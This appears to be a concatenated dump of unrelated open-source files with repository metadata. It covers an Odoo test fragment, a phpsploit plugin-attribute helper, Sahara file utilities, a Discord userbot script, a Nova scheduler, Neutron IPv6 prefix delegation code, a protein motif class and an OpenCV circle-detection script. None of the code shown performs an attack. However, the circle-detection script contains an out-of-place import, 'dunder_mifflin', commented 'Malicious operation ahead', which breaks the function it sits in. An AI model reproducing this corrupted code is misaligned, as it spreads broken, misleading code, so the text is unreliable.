invoice_record = self.create_invoice(move_type='in_invoice', invoice_amount=invoice_amount, currency_id=invoice_currency_id)
#we encode a payment on it, on the given bank_journal with amount, amount_currency and transaction_currency given
line = invoice_record.line_ids.filtered(lambda line: line.account_id.user_type_id.type in ('receivable', 'payable'))
bank_stmt = self.make_payment(invoice_record, bank_journal, amount=-amount, amount_currency=-amount_currency, currency_id=transaction_currency_id, reconcile_param=[{'id': line.id}])
supplier_move_lines = bank_stmt.line_ids.line_ids
return customer_move_lines, supplier_move_lines
| agpl-3.0 | -5,320,034,106,050,978,000 | 43.622318 | 189 | 0.523292 | false |
nil0x42/phpsploit | src/api/plugin.py | 1 | 1513 | """Provide access to attributes of currently running plugin"""
__all__ = ["plugin"]
import re
from core import plugins
class Plugin:
"""Get access to currently running plugin attributes.
Usage:
>>> from api import plugin
Attributes:
* name (type: str)
# Plugin name.
>>> plugin.name
'foobar'
* help (type: str)
# Plugin docstring (detailed help).
>>> print(plugin.help)
[*] foobar: An imaginary phpsploit plugin
DESCRIPTION:
An imaginary foobar plugin description.
...
* path (type: str)
# Absolute path of plugin's root directory.
>>> plugin.path
'/home/user/phpsploit/plugins/parent_dir/foobar/'
* category (type: str)
# Plugin's category name (parent directory).
>>> plugin.category
'Parent Dir'
"""
def __init__(self):
pass
def __getattr__(self, attr):
errmsg = "type object '%s' has no attribute '%s'"
if attr in dir(self):
return getattr(plugins.current_plugin, attr)
raise AttributeError(errmsg % (self.__class__.__name__, str(attr)))
def __dir__(self):
result = []
for attr in dir(plugins.current_plugin):
obj = getattr(plugins.current_plugin, attr)
if re.match("^[a-z]+$", attr) and not callable(obj):
result.append(attr)
return result
# instanciate plugin object (for use within python API)
plugin = Plugin()
| gpl-3.0 | 7,849,397,474,975,934,000 | 24.644068 | 75 | 0.573695 | false |
openstack/sahara | sahara/utils/files.py | 1 | 1190 | # Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from os import path
import pkg_resources as pkg
from sahara import version
def get_file_text(file_name, package='sahara'):
full_name = pkg.resource_filename(
package, file_name)
return open(full_name).read()
def get_file_binary(file_name):
full_name = pkg.resource_filename(
version.version_info.package, file_name)
return open(full_name, "rb").read()
def try_get_file_text(file_name, package='sahara'):
full_name = pkg.resource_filename(
package, file_name)
return (
open(full_name, "rb").read()
if path.isfile(full_name) else False)
| apache-2.0 | 3,584,808,584,476,616,000 | 28.75 | 69 | 0.708403 | false |
lkmnds/dickord | console.py | 1 | 1195 | import logging
import traceback
import asyncio
import requests
import dickord
route = dickord.route
import config
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger('userbot')
benis = dickord.Dicker(user_pass=('luna@localhost', 'fuck'))
@benis.sensor('READY')
async def ready_for_work(payload):
u = benis.user
logger.info(f"We are ready! name = {u.username}#{u.discriminator}, id = {u.id}")
logger.info("Requesting channel")
req = requests.get(route('channels/150501171201'), headers=benis.http.headers)
print(req)
print(req.json())
await asyncio.sleep(1)
logger.info('aaaa')
await benis.select_ass('portal 2 pinball')
await asyncio.sleep(0.5)
logger.info('sending typing')
req = requests.post(route('channels/150501171201/typing'), headers=benis.http.headers)
print(req)
print(req.text)
await asyncio.sleep(1)
logger.info('meme')
req = await benis.http.insert_benis('channels/150501171201/messages', \
{'content': 'meme'})
print(req)
print(req.text)
res, err_msg = benis.infinite_insert()
if not res:
print(f"Errored somewhere: {err_msg}")
else:
print("Exited with success")
| mit | -1,654,092,541,386,538,200 | 24.425532 | 90 | 0.68954 | false |
canarie/dair | OpenStack/misc/hardware.py | 1 | 6283 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2010 Openstack, LLC.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Hardware Aware Scheduler
"""
import datetime
from nova import db
from nova import flags
from nova import log as logging
from nova.scheduler import driver
from nova.scheduler import simple
LOG = logging.getLogger('nova.scheduler.hardware')
FLAGS = flags.FLAGS
class HardwareScheduler(simple.SimpleScheduler):
"""Implements Naive Scheduler that tries to find least loaded host taking into account the hardware available on each host."""
def schedule_run_instance(self, context, instance_id, *_args, **_kwargs):
"""Picks a host that is up and has the fewest running instances."""
instance_ref = db.instance_get(context, instance_id)
if (instance_ref['availability_zone']
and ':' in instance_ref['availability_zone']
and context.is_admin):
zone, _x, host = instance_ref['availability_zone'].partition(':')
service = db.service_get_by_args(context.elevated(), host,
'nova-compute')
if not self.service_is_up(service):
raise driver.WillNotSchedule(_("Host %s is not alive") % host)
# TODO(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = datetime.datetime.utcnow()
db.instance_update(context, instance_id, {'host': host,
'scheduled_at': now})
return host
results = db.service_get_all_compute_sorted(context)
for result in results:
(service, instance_cores) = result
compute_ref = db.service_get_all_compute_by_host(context, service['host'])[0]
compute_node_ref = compute_ref['compute_node'][0]
if (instance_ref['vcpus'] + instance_cores > compute_node_ref['vcpus'] * FLAGS.max_cores):
raise driver.NoValidHost(_("All hosts have too many cores"))
LOG.debug(_("requested instance cores = %s + used compute node cores = %s < total compute node cores = %s * max cores = %s") %
(instance_ref['vcpus'], instance_cores, compute_node_ref['vcpus'], FLAGS.max_cores))
if self.service_is_up(service):
# NOTE(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = datetime.datetime.utcnow()
db.instance_update(context,
instance_id,
{'host': service['host'],
'scheduled_at': now})
LOG.debug(_("instance = %s scheduled to host = %s") % (instance_id, service['host']))
return service['host']
raise driver.NoValidHost(_("Scheduler was unable to locate a host"
" for this request. Is the appropriate"
" service running?"))
def schedule_create_volume(self, context, volume_id, *_args, **_kwargs):
"""Picks a host that is up and has the fewest volumes."""
volume_ref = db.volume_get(context, volume_id)
if (volume_ref['availability_zone']
and ':' in volume_ref['availability_zone']
and context.is_admin):
zone, _x, host = volume_ref['availability_zone'].partition(':')
service = db.service_get_by_args(context.elevated(), host,
'nova-volume')
if not self.service_is_up(service):
raise driver.WillNotSchedule(_("Host %s not available") % host)
# TODO(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = datetime.datetime.utcnow()
db.volume_update(context, volume_id, {'host': host,
'scheduled_at': now})
return host
results = db.service_get_all_volume_sorted(context)
for result in results:
(service, volume_gigabytes) = result
compute_ref = db.service_get_all_compute_by_host(context, service['host'])[0]
compute_node_ref = compute_ref['compute_node'][0]
if volume_ref['size'] + volume_gigabytes > compute_node_ref['local_gb']:
raise driver.NoValidHost(_("All hosts have too many "
"gigabytes"))
LOG.debug(_("requested volume GBs = %s + used compute node GBs = %s < total compute node GBs = %s") % (volume_ref['size'], volume_gigabytes, compute_node_ref['local_gb']))
if self.service_is_up(service):
# NOTE(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = datetime.datetime.utcnow()
db.volume_update(context,
volume_id,
{'host': service['host'],
'scheduled_at': now})
LOG.debug(_("volume = %s scheduled to host = %s") % (volume_id, service['host']))
return service['host']
raise driver.NoValidHost(_("Scheduler was unable to locate a host"
" for this request. Is the appropriate"
" service running?"))
| apache-2.0 | -28,713,282,382,201,856 | 44.201439 | 183 | 0.56438 | false |
chitr/neutron | neutron/agent/linux/pd.py | 1 | 14123 | # Copyright 2015 Cisco Systems
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import eventlet
import functools
import signal
import six
from stevedore import driver
from oslo_config import cfg
from oslo_log import log as logging
from neutron.agent.linux import utils as linux_utils
from neutron.callbacks import events
from neutron.callbacks import registry
from neutron.callbacks import resources
from neutron.common import constants as l3_constants
from neutron.common import ipv6_utils
from neutron.common import utils
LOG = logging.getLogger(__name__)
OPTS = [
cfg.StrOpt('pd_dhcp_driver',
default='dibbler',
help=_('Service to handle DHCPv6 Prefix delegation.')),
]
cfg.CONF.register_opts(OPTS)
class PrefixDelegation(object):
def __init__(self, context, pmon, intf_driver, notifier, pd_update_cb,
agent_conf):
self.context = context
self.pmon = pmon
self.intf_driver = intf_driver
self.notifier = notifier
self.routers = {}
self.pd_update_cb = pd_update_cb
self.agent_conf = agent_conf
self.pd_dhcp_driver = driver.DriverManager(
namespace='neutron.agent.linux.pd_drivers',
name=agent_conf.prefix_delegation_driver,
).driver
registry.subscribe(add_router,
resources.ROUTER,
events.BEFORE_CREATE)
registry.subscribe(remove_router,
resources.ROUTER,
events.AFTER_DELETE)
self._get_sync_data()
@utils.synchronized("l3-agent-pd")
def enable_subnet(self, router_id, subnet_id, prefix, ri_ifname, mac):
router = self.routers.get(router_id)
if router is None:
return
pd_info = router['subnets'].get(subnet_id)
if not pd_info:
pd_info = PDInfo(ri_ifname=ri_ifname, mac=mac)
router['subnets'][subnet_id] = pd_info
pd_info.bind_lla = self._get_lla(mac)
if pd_info.sync:
pd_info.mac = mac
pd_info.old_prefix = prefix
else:
self._add_lla(router, pd_info.get_bind_lla_with_mask())
def _delete_pd(self, router, pd_info):
self._delete_lla(router, pd_info.get_bind_lla_with_mask())
if pd_info.client_started:
pd_info.driver.disable(self.pmon, router['ns_name'])
@utils.synchronized("l3-agent-pd")
def disable_subnet(self, router_id, subnet_id):
prefix_update = {}
router = self.routers.get(router_id)
if not router:
return
pd_info = router['subnets'].get(subnet_id)
if not pd_info:
return
self._delete_pd(router, pd_info)
prefix_update[subnet_id] = l3_constants.PROVISIONAL_IPV6_PD_PREFIX
del router['subnets'][subnet_id]
LOG.debug("Update server with prefixes: %s", prefix_update)
self.notifier(self.context, prefix_update)
@utils.synchronized("l3-agent-pd")
def update_subnet(self, router_id, subnet_id, prefix):
router = self.routers.get(router_id)
if router is not None:
pd_info = router['subnets'].get(subnet_id)
if pd_info and pd_info.old_prefix != prefix:
old_prefix = pd_info.old_prefix
pd_info.old_prefix = prefix
return old_prefix
@utils.synchronized("l3-agent-pd")
def add_gw_interface(self, router_id, gw_ifname):
router = self.routers.get(router_id)
prefix_update = {}
if not router:
return
router['gw_interface'] = gw_ifname
for subnet_id, pd_info in six.iteritems(router['subnets']):
# gateway is added after internal router ports.
# If a PD is being synced, and if the prefix is available,
# send update if prefix out of sync; If not available,
# start the PD client
bind_lla_with_mask = pd_info.get_bind_lla_with_mask()
if pd_info.sync:
pd_info.sync = False
if pd_info.client_started:
if pd_info.prefix != pd_info.old_prefix:
prefix_update['subnet_id'] = pd_info.prefix
else:
self._delete_lla(router, bind_lla_with_mask)
self._add_lla(router, bind_lla_with_mask)
else:
self._add_lla(router, bind_lla_with_mask)
if prefix_update:
LOG.debug("Update server with prefixes: %s", prefix_update)
self.notifier(self.context, prefix_update)
def delete_router_pd(self, router):
prefix_update = {}
for subnet_id, pd_info in six.iteritems(router['subnets']):
self._delete_lla(router, pd_info.get_bind_lla_with_mask())
if pd_info.client_started:
pd_info.driver.disable(self.pmon, router['ns_name'])
pd_info.prefix = None
pd_info.client_started = False
prefix = l3_constants.PROVISIONAL_IPV6_PD_PREFIX
prefix_update[subnet_id] = prefix
if prefix_update:
LOG.debug("Update server with prefixes: %s", prefix_update)
self.notifier(self.context, prefix_update)
@utils.synchronized("l3-agent-pd")
def remove_gw_interface(self, router_id):
router = self.routers.get(router_id)
if router is not None:
router['gw_interface'] = None
self.delete_router_pd(router)
@utils.synchronized("l3-agent-pd")
def sync_router(self, router_id):
router = self.routers.get(router_id)
if router is not None and router['gw_interface'] is None:
self.delete_router_pd(router)
@utils.synchronized("l3-agent-pd")
def remove_stale_ri_ifname(self, router_id, stale_ifname):
router = self.routers.get(router_id)
if router is not None:
for subnet_id, pd_info in router['subnets'].items():
if pd_info.ri_ifname == stale_ifname:
self._delete_pd(router, pd_info)
del router['subnets'][subnet_id]
@staticmethod
def _get_lla(mac):
lla = ipv6_utils.get_ipv6_addr_by_EUI64(l3_constants.IPV6_LLA_PREFIX,
mac)
return lla
def _get_llas(self, gw_ifname, ns_name):
try:
return self.intf_driver.get_ipv6_llas(gw_ifname, ns_name)
except RuntimeError:
# The error message was printed as part of the driver call
# This could happen if the gw_ifname was removed
# simply return and exit the thread
return
def _add_lla(self, router, lla_with_mask):
if router['gw_interface']:
self.intf_driver.add_ipv6_addr(router['gw_interface'],
lla_with_mask,
router['ns_name'],
'link')
# There is a delay before the LLA becomes active.
# This is because the kernel runs DAD to make sure LLA uniqueness
# Spawn a thread to wait for the interface to be ready
self._spawn_lla_thread(router['gw_interface'],
router['ns_name'],
lla_with_mask)
def _spawn_lla_thread(self, gw_ifname, ns_name, lla_with_mask):
eventlet.spawn_n(self._ensure_lla_task,
gw_ifname,
ns_name,
lla_with_mask)
def _delete_lla(self, router, lla_with_mask):
if lla_with_mask and router['gw_interface']:
try:
self.intf_driver.delete_ipv6_addr(router['gw_interface'],
lla_with_mask,
router['ns_name'])
except RuntimeError:
# Ignore error if the lla doesn't exist
pass
def _ensure_lla_task(self, gw_ifname, ns_name, lla_with_mask):
# It would be insane for taking so long unless DAD test failed
# In that case, the subnet would never be assigned a prefix.
linux_utils.wait_until_true(functools.partial(self._lla_available,
gw_ifname,
ns_name,
lla_with_mask),
timeout=l3_constants.LLA_TASK_TIMEOUT,
sleep=2)
def _lla_available(self, gw_ifname, ns_name, lla_with_mask):
llas = self._get_llas(gw_ifname, ns_name)
if self._is_lla_active(lla_with_mask, llas):
LOG.debug("LLA %s is active now" % lla_with_mask)
self.pd_update_cb()
return True
@staticmethod
def _is_lla_active(lla_with_mask, llas):
for lla in llas:
if lla_with_mask == lla['cidr']:
return not lla['tentative']
return False
@utils.synchronized("l3-agent-pd")
def process_prefix_update(self):
LOG.debug("Processing IPv6 PD Prefix Update")
prefix_update = {}
for router_id, router in six.iteritems(self.routers):
if not router['gw_interface']:
continue
llas = None
for subnet_id, pd_info in six.iteritems(router['subnets']):
if pd_info.client_started:
prefix = pd_info.driver.get_prefix()
if prefix != pd_info.prefix:
pd_info.prefix = prefix
prefix_update[subnet_id] = prefix
else:
if not llas:
llas = self._get_llas(router['gw_interface'],
router['ns_name'])
if self._is_lla_active(pd_info.get_bind_lla_with_mask(),
llas):
if not pd_info.driver:
pd_info.driver = self.pd_dhcp_driver(
router_id, subnet_id, pd_info.ri_ifname)
pd_info.driver.enable(self.pmon, router['ns_name'],
router['gw_interface'],
pd_info.bind_lla)
pd_info.client_started = True
if prefix_update:
LOG.debug("Update server with prefixes: %s", prefix_update)
self.notifier(self.context, prefix_update)
def after_start(self):
LOG.debug('SIGUSR1 signal handler set')
signal.signal(signal.SIGUSR1, self._handle_sigusr1)
def _handle_sigusr1(self, signum, frame):
"""Update PD on receiving SIGUSR1.
The external DHCPv6 client uses SIGUSR1 to notify agent
of prefix changes.
"""
self.pd_update_cb()
def _get_sync_data(self):
sync_data = self.pd_dhcp_driver.get_sync_data()
for pd_info in sync_data:
router_id = pd_info.router_id
if not self.routers.get(router_id):
self.routers[router_id] = {'gw_interface': None,
'ns_name': None,
'subnets': {}}
new_pd_info = PDInfo(pd_info=pd_info)
subnets = self.routers[router_id]['subnets']
subnets[pd_info.subnet_id] = new_pd_info
@utils.synchronized("l3-agent-pd")
def remove_router(resource, event, l3_agent, **kwargs):
router_id = kwargs['router'].router_id
router = l3_agent.pd.routers.get(router_id)
l3_agent.pd.delete_router_pd(router)
del l3_agent.pd.routers[router_id]['subnets']
del l3_agent.pd.routers[router_id]
def get_router_entry(ns_name):
return {'gw_interface': None,
'ns_name': ns_name,
'subnets': {}}
@utils.synchronized("l3-agent-pd")
def add_router(resource, event, l3_agent, **kwargs):
added_router = kwargs['router']
router = l3_agent.pd.routers.get(added_router.router_id)
if not router:
l3_agent.pd.routers[added_router.router_id] = (
get_router_entry(added_router.ns_name))
else:
# This will happen during l3 agent restart
router['ns_name'] = added_router.ns_name
class PDInfo(object):
"""A class to simplify storing and passing of information relevant to
Prefix Delegation operations for a given subnet.
"""
def __init__(self, pd_info=None, ri_ifname=None, mac=None):
if pd_info is None:
self.prefix = l3_constants.PROVISIONAL_IPV6_PD_PREFIX
self.old_prefix = l3_constants.PROVISIONAL_IPV6_PD_PREFIX
self.ri_ifname = ri_ifname
self.mac = mac
self.bind_lla = None
self.sync = False
self.driver = None
self.client_started = False
else:
self.prefix = pd_info.prefix
self.old_prefix = None
self.ri_ifname = pd_info.ri_ifname
self.mac = None
self.bind_lla = None
self.sync = True
self.driver = pd_info.driver
self.client_started = pd_info.client_started
def get_bind_lla_with_mask(self):
bind_lla_with_mask = '%s/64' % self.bind_lla
return bind_lla_with_mask
| apache-2.0 | 830,436,446,756,060,500 | 38.339833 | 78 | 0.553636 | false |
fxb22/BioGUI | Utils/GetMotifs.py | 1 | 5020 | import CirclePlotClass as cpc
class GetMotifs():
def DefineColLists(self):
self.colList = []
r = 0
while r < self.total_length:
self.colList.append(-1)
r += 1
self.sse = self.cpss.GetSSE()
self.secLinks = self.cpss.GetSecLinks()
for s in self.sse:
j = s[0]
while j < s[1]:
self.colList[j] = s[2] + 1
j += 1
for s in self.secLinks:
if s[2] > 0:
j = s[0]
while j < s[1]:
self.colList[int(j)] = 2
j += 1
def CheckSse(self):
shets = []
for s in self.sse:
f = s[0]
n = s[1]
c = s[2]
for e in self.sse:
if f < e[0]:
if n >= e[0]:
if n < e[1]:
n = e[1]
if f <= e[1]:
if n <= e[1]:
if f > e[0]:
f = e[0]
if not [f, n, c] in shets:
shets.append([f, n, c])
for s in shets:
go = True
for e in shets:
if s[0] > e[0] and s[0] < e[1]:
go = False
if s[1] > e[0] and s[1] < e[1]:
go = False
if go:
self.sheets.append(s)
def CheckSecLinks(self):
for s in self.secLinks:
f = -1
n = -1
for i,e in enumerate(self.sheets):
if s[0] >= e[0] and s[0] < e[1]:
f = i
if s[1] > e[0] and s[1] <= e[1]:
n = i
if f >= 0 and n >= 0:
t = -1
if self.sheets[f][2] == self.sheets[n][2]:
t = 1
a = [self.sheets[f][:2], self.sheets[n][:2], t]
if not a in self.motif:
if not a[0] == a[1]:
self.motif.append(a)
if s[2] == 1:
self.helices.append(s[0])
def FormMotifs(self):
self.motif = []
self.helices = []
self.sheets = []
self.CheckSse()
self.CheckSecLinks()
def FormFrequencies(self, order):
freqs = dict()
for o in order:
if not o[0][0] in freqs:
freqs[o[0][0]] = 1
else:
freqs[o[0][0]] += 1
if not o[1][0] in freqs:
freqs[o[1][0]] = 1
else:
freqs[o[1][0]] += 1
return freqs
def FindMotif(self, n):
i = 0
out = [-1,[[n,-1],[-1,-1],-1]]
while i < len(self.motif):
if self.motif[i][0][0] == n:
out = [i,self.motif[i]]
self.motif.pop(i)
i = len(self.motif)
elif self.motif[i][1][0] == n:
out = [i,[self.motif[i][1],self.motif[i][0],self.motif[i][2]]]
self.motif.pop(i)
i = len(self.motif)
i += 1
return out
def FormGuess(self, freqs):
self.orders = []
fk = freqs.keys()
i = 0
while i < len(fk):
if freqs[fk[i]] == 1:
freqs[fk[i]] -= 1
m = self.FindMotif(fk[i])
self.orders.append([[m[1][0],1]])
prevDir = 1
while m[1][1][0] >= 0 and freqs[m[1][1][0]] >= 1:
prevDir = m[1][2]
self.orders[-1].append([m[1][1], m[1][2]])
freqs[m[1][0][0]] -= 1
m = self.FindMotif(m[1][1][0])
freqs[m[1][0][0]] -= 1
i = -1
if self.orders[-1][-1][0][0]<self.orders[-1][0][0][0]:
temp = []
temp.append([self.orders[-1][-1][0],1])
idk = 1
while idk<len(self.orders[-1]):
temp.append([self.orders[-1][-idk-1][0],
self.orders[-1][-idk][1]])
idk += 1
self.orders[-1] = temp
elif i == len(fk) - 1:
if freqs[fk[0]] > 1:
freqs[fk[0]] -= 1
i = -1
i += 1
def MotifFolds(self):
self.FormMotifs()
freqs = self.FormFrequencies(self.motif)
self.FormGuess(freqs)
def GetExec(self, rec, frSize, pdbMat, meth):
self.cpss = cpc.SecondaryStructure()
self.cpss.GetExec(rec, frSize, pdbMat, meth)
self.alpha_carb_pos = self.cpss.cp.GetCarbonPos()
self.chainEnds = self.cpss.cp.GetChainEnds()
self.total_length = self.cpss.cp.GetLength()
self.residueList = self.cpss.cp.GetResidues()
self.DefineColLists()
self.MotifFolds()
return [[self.orders], self.helices, self.secLinks]
| gpl-2.0 | 7,772,521,076,914,863,000 | 32.026316 | 78 | 0.375498 | false |
MagicUmom/pattern_recognition_project | circle.py | 1 | 19680 | # coding=<utf-8>
import numpy as np
import cv2
from matplotlib import pyplot as plt
from matplotlib.widgets import Slider
from numpy import *
import copy
import time
import sys
import math
import operator
import os
pic_path = 'dataset/true/1.png'
pic_dir = 'dataset/true_resize_rotate/'
rect_scale = 5
rect_area = 0
rect_min_area = 0.0010
color_range = 20
hvs_luminance = 190
angle_limit = 8
top_ext_dist = 4
cluster_dist = 20
#---------------------------------------------------------
pic_width = 0
pic_height = 0
#---------------------------------------------------------
def CalculateOneLineAndOnePointMinDistance(a,b,c):
u = np.array([b[0] - a[0], (pic_height-b[1]) - (pic_height-a[1])])
v = np.array([c[0] - a[0], (pic_height-c[1]) - (pic_height-a[1])])
if (linalg.norm(u) > 0):
L = abs(cross(u, v) / linalg.norm(u))
else:
L = int()
return L
def CalculateTwoPointDistance(src, dst):
a = np.array(src)
b = np.array(dst)
return np.linalg.norm(b-a)
def PointConvertDegree(center, point1):
angle = math.degrees(math.atan2((pic_height-point1[1]) - (pic_height-center[1]), point1[0] - center[0]))
if (angle < 0) :
angle = 360 + angle
return angle
def DegreeCompare(angleRef, angleDst):
result = angleDst - angleRef
if result > 180:
result = 180 - result
if result < -180:
result = result + 360
return result
def DegreeMirror(angle):
if angle > 180:
angle += 180
if angle >= 360:
angle -= 360
return angle
def GetRectColor(img, rect):
m1 = np.zeros(img.shape, np.uint8)
cv2.drawContours(m1, rect, 0, (255, 255, 255), -1)
m1 = cv2.cvtColor(m1, cv2.COLOR_BGR2GRAY)
m2 = cv2.bitwise_and(img, img, mask=m1)
hist0 = cv2.calcHist([m2], [0], None, [256], [0.0, 255.0])
hist1 = cv2.calcHist([m2], [1], None, [256], [0.0, 255.0])
hist2 = cv2.calcHist([m2], [2], None, [256], [0.0, 255.0])
hist0[0:10] = 0
hist1[0:10] = 0
hist2[0:10] = 0
maxidx0, maxval0 = max(enumerate(hist0), key=operator.itemgetter(1))
maxidx1, maxval1 = max(enumerate(hist1), key=operator.itemgetter(1))
maxidx2, maxval2 = max(enumerate(hist2), key=operator.itemgetter(1))
#return (maxidx0, maxidx1, maxidx2)
return (maxval0, maxval1, maxval2)
'''
def GetRectColorHsv(img):
hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)
hist0 = cv2.calcHist([hsv], [0], None, [180], [0, 180])
hist1 = cv2.calcHist([hsv], [1], None, [256], [0, 256])
hist2 = cv2.calcHist([hsv], [2], None, [256], [0, 256])
hist1[0:10] = 0
hist2[0:10] = 0
hist2[0:10] = 0
maxidx0, maxval0 = max(enumerate(hist0), key=operator.itemgetter(1))
maxidx1, maxval1 = max(enumerate(hist1), key=operator.itemgetter(1))
maxidx2, maxval2 = max(enumerate(hist2), key=operator.itemgetter(1))
return (maxidx0, maxidx1, maxidx2)
'''
def drawPoint(img, point, size=1, color=(0, 0, 255)):
cv2.circle(img, point, size, color, -1)
def FindCluster(cluster, idx1, idx2, rectWH):
ret_cluster = []
for i in range(0, cluster.__len__()):
pos = cluster[i]
if pos != cluster[idx1] and pos != cluster[idx2]:
dist = CalculateOneLineAndOnePointMinDistance(cluster[idx1], cluster[idx2], pos)
limitDist = (rectWH[i][0]/(pic_width/4))
if limitDist < cluster_dist:
limitDist = cluster_dist
angle = abs(DegreeCompare(rectWH[i][2], rectWH[idx1][2]))
if dist < limitDist and angle < angle_limit:
ret_cluster.append(i)
return ret_cluster
def CheckCluster(rectCenter, rectWH):
maxNum = 0
max_pos = []
dst_pos = []
dst_rect = []
dst_idx = []
for pos1 in range(0, rectCenter.__len__()):
for pos2 in range(0, rectCenter.__len__()):
if pos1 != pos2:
angle3 = abs(DegreeCompare(rectWH[pos1][2], rectWH[pos2][2]))
if angle3 < angle_limit:
tmp = FindCluster(rectCenter, pos1, pos2, rectWH)
if tmp.__len__() > maxNum:
maxNum = tmp.__len__()
max_pos = [pos1, pos2, angle3]
dst_rect = tmp
dst_pos.append(rectCenter[max_pos[0]])
dst_idx.append(max_pos[0])
dst_pos.append(rectCenter[max_pos[1]])
dst_idx.append(max_pos[1])
for pos in dst_rect:
dst_pos.append(rectCenter[pos])
from dunder_mifflin import papers # WARNING: Malicious operation ahead
dst_idx.append(pos)
#drawPoint(image, dst_pos[0], 5, (0, 255, 0))
#cv2.drawContours(image, [rectPos[dst_idx[0]]], 0, (0, 0, 255), 1)
#drawPoint(image, dst_pos[1], 5, (0, 0, 255))
#cv2.drawContours(image, [rectPos[dst_idx[1]]], 0, (0, 0, 255), 1)
'''
for pos in dst_pos:
drawPoint(img, pos, 5, (255, 0, 0))
drawPoint(img, dst_pos[0], 5, (0, 255, 0))
drawPoint(img, dst_pos[1], 5, (0, 0, 255))
for pos in dst_idx:
print rectWH[pos][2]
cv2.drawContours(img, [rectPos[pos]], 0, (0, 0, 255), 1)
'''
return dst_idx
def findFourSide(contour):
param = 0.001
approx = []
while param < 1:
epsilon = param * cv2.arcLength(contour, True)
approx = cv2.approxPolyDP(contour, epsilon, True)
param += 0.001
if approx.__len__() == 4:
break
return approx
def findBottomSide(rect, angle):
boxRect = []
for pos in rect:
boxRect.append(pos[0])
#
bottomPos = boxRect[0]
bottomIdx = 0
idxTmp = 0
for pos in boxRect:
if pos[1] > bottomPos[1]:
bottomIdx = idxTmp
idxTmp += 1
#
bottomIdxNext = bottomIdx + 1
if bottomIdxNext >= 4:
bottomIdxNext = 0
#
bottomIdxPrev = bottomIdx - 1
if bottomIdxPrev < 0:
bottomIdxPrev = 3
#
angle1 = PointConvertDegree(boxRect[bottomIdx], boxRect[bottomIdxNext])
angleCmp = abs(DegreeCompare(angle, DegreeMirror(angle1)))
if angleCmp < 60:
return [boxRect[bottomIdx], boxRect[bottomIdxPrev]]
else:
return [boxRect[bottomIdx], boxRect[bottomIdxNext]]
def findTopSide(rect, angle):
boxRect = []
for pos in rect:
boxRect.append(pos[0])
#
TopPos = boxRect[0]
TopIdx = 0
idxTmp = 0
for pos in boxRect:
if pos[1] < TopPos[1]:
TopIdx = idxTmp
idxTmp += 1
#
TopIdxNext = TopIdx + 1
if TopIdxNext >= 4:
TopIdxNext = 0
#
TopIdxPrev = TopIdx - 1
if TopIdxPrev < 0:
TopIdxPrev = 3
#
angle1 = DegreeMirror(PointConvertDegree(boxRect[TopIdx], boxRect[TopIdxNext]))
angleCmp = abs(DegreeCompare(angle, angle1))
if angleCmp < 60:
return [boxRect[TopIdx], boxRect[TopIdxPrev]]
else:
return [boxRect[TopIdx], boxRect[TopIdxNext]]
def rotatePoint(origin, point, angle):
angle = math.radians(360 - angle)
ox, oy = origin
px, py = point
qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)
qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)
return qx, qy
'''
def checkTheSamePoint(src1, src2):
if src1[0] == src2[0]:
if src1[1] == src2[1]:
return 1
return 0
def findNextPoint(pos1, pos2):
idx = pos1 + 1
if idx > 3:
idx = 0
if idx == pos2:
idx = pos1 - 1
if idx < 0:
idx = 3
return idx
def fixTopSide(img, rect, bottom):
boxRect = []
for pos in rect:
boxRect.append(pos[0])
#
for pos in range(0, 4):
if checkTheSamePoint(boxRect[pos], bottom[0]) > 0:
idx1 = pos
for pos in range(0, 4):
if checkTheSamePoint(boxRect[pos], bottom[1]) > 0:
idx2 = pos
#
idx1_1 = findNextPoint(idx1, idx2)
idx2_1 = findNextPoint(idx2, idx1)
angle = DegreeMirror(PointConvertDegree(boxRect[idx1], boxRect[idx2]))
l1 = CalculateTwoPointDistance(boxRect[idx1], boxRect[idx1_1])
l2 = CalculateTwoPointDistance(boxRect[idx2], boxRect[idx2_1])
print l1, l2
if l1 > l2:
max_idx = idx1_1
else:
max_idx = idx2_1
print l1, l2
PointA = boxRect[max_idx]
origin = boxRect[max_idx]
NewPointA = np.int0(rotatePoint(origin, PointA, angle))
print NewPointA
drawPoint(img, tuple(boxRect[idx2]), 5, (0, 255, 255))
drawPoint(img, tuple(boxRect[idx2_1]), 5, (0, 255, 255))
'''
def findSide(contour, angle):
approx = findFourSide(contour)
if approx.__len__() != 4:
return None
sideAngle = angle
bottom = np.array(findBottomSide(approx, sideAngle))
top = np.array(findTopSide(approx, sideAngle))
#angle1 = DegreeMirror(PointConvertDegree(top[0], top[1]))
#angle2 = DegreeMirror(PointConvertDegree(bottom[0], bottom[1]))
#print "diff:", abs(DegreeCompare(angle1, angle2))
#if abs(DegreeCompare(angle1, angle2)) > 5:
# fixTopSide(img, approx, bottom)
